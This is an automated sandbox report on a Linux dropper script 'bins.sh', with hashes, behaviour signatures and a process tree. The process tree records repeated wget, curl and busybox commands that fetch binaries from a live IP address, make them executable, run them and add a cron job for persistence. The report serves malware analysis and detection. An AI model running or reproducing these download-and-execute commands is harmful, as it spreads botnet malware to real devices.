Analysis

  • max time kernel
    14s
  • max time network
    66s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28-10-2024 10:12

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    019b932cccb51c260ae4464eb3fd0092

  • SHA1

    c279f35f12944e0c4277449bb08dcbd8738f4ffb

  • SHA256

    d2f402d2f4147e1cb42252757661db0b29a8ba02bc3dc2cb8ecc85bd552d6e13

  • SHA512

    24c2904d745466745babb3702d7f821bfff0b46bcc0bd80ed128772d5b747859deed32ffa836e2316d6673def113ac732ea81641fc68a12aceeb3884bb80dcb6

  • SSDEEP

    96:jz5y3yWV+e0QRfltDeRN0mW9OC9Ytzs5j/uBfltDeRN2dmW9OCfJu0wGvqwP/Kze:AyQvbmW9OC9Yds5jILmW9OC9HC+

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 5 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 14 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:645
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:647
        • /usr/bin/wget
          wget http://87.120.126.196/bins/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX
          2⤵
          • Writes file to tmp directory
          PID:648
        • /usr/bin/curl
          curl -O http://87.120.126.196/bins/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX
          2⤵
          • Checks CPU configuration
          • Writes file to tmp directory
          PID:664
        • /bin/busybox
          /bin/busybox wget http://87.120.126.196/bins/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX
          2⤵
          • Writes file to tmp directory
          PID:670
        • /bin/chmod
          chmod 777 OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX
          2⤵
          • File and Directory Permissions Modification
          PID:673
        • /tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX
          ./OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX
          2⤵
          • Executes dropped EXE
          PID:675
        • /bin/rm
          rm OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX
          2⤵
            PID:678
          • /usr/bin/wget
            wget http://87.120.126.196/bins/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC
            2⤵
            • Writes file to tmp directory
            PID:680
          • /usr/bin/curl
            curl -O http://87.120.126.196/bins/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC
            2⤵
            • Checks CPU configuration
            • Writes file to tmp directory
            PID:684
          • /bin/busybox
            /bin/busybox wget http://87.120.126.196/bins/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC
            2⤵
            • Writes file to tmp directory
            PID:685
          • /bin/chmod
            chmod 777 lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC
            2⤵
            • File and Directory Permissions Modification
            PID:686
          • /tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC
            ./lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC
            2⤵
            • Executes dropped EXE
            • Renames itself
            • Reads runtime system information
            PID:687
            • /bin/sh
              sh -c "crontab -l"
              3⤵
                PID:689
                • /usr/bin/crontab
                  crontab -l
                  4⤵
                  • Reads runtime system information
                  PID:690
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:691
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    • Reads runtime system information
                    PID:692
              • /bin/rm
                rm lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC
                2⤵
                  PID:698
                • /usr/bin/wget
                  wget http://87.120.126.196/bins/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V
                  2⤵
                    PID:703
                  • /usr/bin/curl
                    curl -O http://87.120.126.196/bins/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V
                    2⤵
                      PID:705
                    • /bin/busybox
                      /bin/busybox wget http://87.120.126.196/bins/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V
                      2⤵
                      • Writes file to tmp directory
                      PID:708
                    • /bin/chmod
                      chmod 777 9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V
                      2⤵
                      • File and Directory Permissions Modification
                      PID:711
                    • /tmp/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V
                      ./9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V
                      2⤵
                      • Executes dropped EXE
                      PID:713
                    • /bin/rm
                      rm 9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V
                      2⤵
                        PID:715
                      • /usr/bin/wget
                        wget http://87.120.126.196/bins/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS
                        2⤵
                          PID:717
                        • /usr/bin/curl
                          curl -O http://87.120.126.196/bins/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS
                          2⤵
                            PID:719
                          • /bin/busybox
                            /bin/busybox wget http://87.120.126.196/bins/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS
                            2⤵
                            • Writes file to tmp directory
                            PID:721
                          • /bin/chmod
                            chmod 777 fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS
                            2⤵
                            • File and Directory Permissions Modification
                            PID:725
                          • /tmp/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS
                            ./fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS
                            2⤵
                            • Executes dropped EXE
                            PID:727
                          • /bin/rm
                            rm fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS
                            2⤵
                              PID:729
                            • /usr/bin/wget
                              wget http://87.120.126.196/bins/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN
                              2⤵
                                PID:730
                              • /usr/bin/curl
                                curl -O http://87.120.126.196/bins/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN
                                2⤵
                                  PID:732
                                • /bin/busybox
                                  /bin/busybox wget http://87.120.126.196/bins/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:735
                                • /bin/chmod
                                  chmod 777 ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:737
                                • /tmp/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN
                                  ./ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN
                                  2⤵
                                  • Executes dropped EXE
                                  PID:738
                                • /bin/rm
                                  rm ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN
                                  2⤵
                                    PID:741
                                  • /usr/bin/wget
                                    wget http://87.120.126.196/bins/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6
                                    2⤵
                                      PID:742
                                    • /usr/bin/curl
                                      curl -O http://87.120.126.196/bins/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6
                                      2⤵
                                        PID:744
                                      • /bin/busybox
                                        /bin/busybox wget http://87.120.126.196/bins/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6
                                        2⤵
                                        • Writes file to tmp directory
                                        PID:747
                                      • /bin/chmod
                                        chmod 777 Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:750
                                      • /tmp/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6
                                        ./Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6
                                        2⤵
                                        • Executes dropped EXE
                                        PID:752
                                      • /bin/rm
                                        rm Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6
                                        2⤵
                                          PID:756
                                        • /usr/bin/wget
                                          wget http://87.120.126.196/bins/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ
                                          2⤵
                                            PID:758
                                          • /usr/bin/curl
                                            curl -O http://87.120.126.196/bins/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ
                                            2⤵
                                            • Checks CPU configuration
                                            • Reads runtime system information
                                            PID:759
                                          • /bin/busybox
                                            /bin/busybox wget http://87.120.126.196/bins/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ
                                            2⤵
                                            • Writes file to tmp directory
                                            PID:761
                                          • /bin/chmod
                                            chmod 777 kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:767
                                          • /tmp/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ
                                            ./kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ
                                            2⤵
                                            • Executes dropped EXE
                                            PID:768
                                          • /bin/rm
                                            rm kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ
                                            2⤵
                                              PID:771
                                            • /usr/bin/wget
                                              wget http://87.120.126.196/bins/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh
                                              2⤵
                                                PID:773
                                              • /usr/bin/curl
                                                curl -O http://87.120.126.196/bins/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh
                                                2⤵
                                                  PID:777
                                                • /bin/busybox
                                                  /bin/busybox wget http://87.120.126.196/bins/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh
                                                  2⤵
                                                  • Writes file to tmp directory
                                                  PID:779
                                                • /bin/chmod
                                                  chmod 777 pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh
                                                  2⤵
                                                  • File and Directory Permissions Modification
                                                  PID:781
                                                • /tmp/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh
                                                  ./pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:782
                                                • /bin/rm
                                                  rm pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh
                                                  2⤵
                                                    PID:783
                                                  • /usr/bin/wget
                                                    wget http://87.120.126.196/bins/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG
                                                    2⤵
                                                      PID:784
                                                    • /usr/bin/curl
                                                      curl -O http://87.120.126.196/bins/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG
                                                      2⤵
                                                      • Checks CPU configuration
                                                      • Reads runtime system information
                                                      PID:785
                                                    • /bin/busybox
                                                      /bin/busybox wget http://87.120.126.196/bins/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG
                                                      2⤵
                                                      • Writes file to tmp directory
                                                      PID:786
                                                    • /bin/chmod
                                                      chmod 777 sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG
                                                      2⤵
                                                      • File and Directory Permissions Modification
                                                      PID:787
                                                    • /tmp/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG
                                                      ./sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:788
                                                    • /bin/rm
                                                      rm sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG
                                                      2⤵
                                                        PID:789
                                                      • /usr/bin/wget
                                                        wget http://87.120.126.196/bins/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ
                                                        2⤵
                                                          PID:790
                                                        • /usr/bin/curl
                                                          curl -O http://87.120.126.196/bins/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ
                                                          2⤵
                                                          • Checks CPU configuration
                                                          • Reads runtime system information
                                                          PID:791
                                                        • /bin/busybox
                                                          /bin/busybox wget http://87.120.126.196/bins/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ
                                                          2⤵
                                                          • Writes file to tmp directory
                                                          PID:792
                                                        • /bin/chmod
                                                          chmod 777 MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ
                                                          2⤵
                                                          • File and Directory Permissions Modification
                                                          PID:795
                                                        • /tmp/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ
                                                          ./MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:796
                                                        • /bin/rm
                                                          rm MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ
                                                          2⤵
                                                            PID:799
                                                          • /usr/bin/wget
                                                            wget http://87.120.126.196/bins/ZUwwzf5RQTGsR9rxK4js3vcYM4ereP90ae
                                                            2⤵
                                                              PID:800

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • /tmp/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V

                                                            Filesize

                                                            129KB

                                                            MD5

                                                            54bec959d900ad930dc662f8092da57d

                                                            SHA1

                                                            9ae7ad9018eeac5aa89bcde68ec683a364ac7d55

                                                            SHA256

                                                            b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12

                                                            SHA512

                                                            904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40

                                                          • /tmp/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ

                                                            Filesize

                                                            93KB

                                                            MD5

                                                            8fad5e89ce3d2b6159ac2ce2fdf7c084

                                                            SHA1

                                                            27105a304b9bb7cd8a663d1b4da1d92fd8eea355

                                                            SHA256

                                                            24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6

                                                            SHA512

                                                            71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc

                                                          • /tmp/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6

                                                            Filesize

                                                            101KB

                                                            MD5

                                                            a7e686eb3f74b104a5520f08cfd54eb5

                                                            SHA1

                                                            58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b

                                                            SHA256

                                                            617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07

                                                            SHA512

                                                            2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df

                                                          • /tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX

                                                            Filesize

                                                            84KB

                                                            MD5

                                                            64ece99ca4ab1c1405f5a3335d64a960

                                                            SHA1

                                                            b7395f2320a5bdadb78943b268708965cdbd1d74

                                                            SHA256

                                                            aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae

                                                            SHA512

                                                            bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41

                                                          • /tmp/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN

                                                            Filesize

                                                            129KB

                                                            MD5

                                                            52f72bcf31899453b40d37a7cbf55f35

                                                            SHA1

                                                            6dfca1bd70aad3e88713b02ec1669ba5a792456c

                                                            SHA256

                                                            ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495

                                                            SHA512

                                                            be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967

                                                          • /tmp/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS

                                                            Filesize

                                                            101KB

                                                            MD5

                                                            8d0f8d45165dc1f3ba334ce75be39621

                                                            SHA1

                                                            1d5baece9d5af3885276735c3c20d28e161e00ff

                                                            SHA256

                                                            17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791

                                                            SHA512

                                                            a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7

                                                          • /tmp/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ

                                                            Filesize

                                                            95KB

                                                            MD5

                                                            c20c610e14b8e59f5f8258a55fe7f27d

                                                            SHA1

                                                            e59a0b83d9882f2770f052a213cad25b0cbd53fc

                                                            SHA256

                                                            adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b

                                                            SHA512

                                                            dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2

                                                          • /tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC

                                                            Filesize

                                                            100KB

                                                            MD5

                                                            3b78bb645b81d600c30713d416f666be

                                                            SHA1

                                                            23796112f2cce2afb2217498b5ecf2801ab550f2

                                                            SHA256

                                                            d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2

                                                            SHA512

                                                            9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

                                                          • /tmp/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh

                                                            Filesize

                                                            158KB

                                                            MD5

                                                            d8e96e2fdd3c610ec19128e18de5abde

                                                            SHA1

                                                            10cf691ae9779bfeca8b67e75721d0a6f275e4f9

                                                            SHA256

                                                            f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b

                                                            SHA512

                                                            979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592

                                                          • /tmp/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG

                                                            Filesize

                                                            108KB

                                                            MD5

                                                            c97a9c55ddb153e8bfce38f201d2cffb

                                                            SHA1

                                                            3970452f27327f98c2e3fdcabf0390067b48bd62

                                                            SHA256

                                                            138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c

                                                            SHA512

                                                            1734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e

                                                          • /var/spool/cron/crontabs/tmp.BvkgLH

                                                            Filesize

                                                            210B

                                                            MD5

                                                            5dfe34fa8fe6a9fe09cc3f97b821e146

                                                            SHA1

                                                            431ff89a7f23e03f3717e841432aab0a40c831c6

                                                            SHA256

                                                            e4c01747eafc1e79850fcf9ba9d5294253e29fd469ad7cfef6ddee2ab7af7aba

                                                            SHA512

                                                            2e18701cde70a61329fce5c339e792ad80acfe88be2b6560e4f91e6bb6cd044992f5e2f900b98d6fa9a8adfc5785defb8ff3637728d1d7e402193f226c0dbe8c